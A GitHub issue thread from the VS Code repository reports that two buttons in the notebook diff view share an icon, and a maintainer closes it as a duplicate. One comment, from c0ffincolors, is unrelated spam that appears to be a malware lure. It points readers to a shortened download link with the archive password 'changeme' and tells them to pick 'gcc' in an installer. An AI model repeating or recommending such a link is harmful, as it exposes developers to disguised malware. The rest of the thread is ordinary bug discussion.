### ISSUE TITLE
`Go to Cell` and `Open File` icons shouldn't be the same?

### ISSUE THREAD

**Issue by bamurtaugh** [microsoft/vscode#226794] opened 2024-08-27 16:48 UTC
Testing #226665

Testing on latest VS Code Insiders and Windows 11 Insiders
```
Version: 1.93.0-insider (user setup)
Commit: ff7a154d5e5e9034914f0466420f0f1407f0c95e
Date: 2024-08-27T05:04:20.235Z
Electron: 30.4.0
ElectronBuildId: 10073054
Chromium: 124.0.6367.243
Node.js: 20.15.1
V8: 12.4.254.20-electron.0
OS: Windows_NT x64 10.0.25987
```

I saw what appeared to be duplicate buttons in the diff view:
![Image](https://github.com/user-attachments/assets/9509fbc7-1b4b-4668-83e2-7197b295bec1)

When hovering over them, I realized they perform different actions (`Go to Cell` and `Open File`). It was confusing to me that they're the same icon.

**Comment by c0ffincolors** [comment] 2024-08-27 16:55
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by DonJayamanne** [comment] 2024-08-27 20:06
Duplicate of https://github.com/microsoft/vscode/pull/226181

**Closed by DonJayamanne** 2024-08-27 20:06 UTC
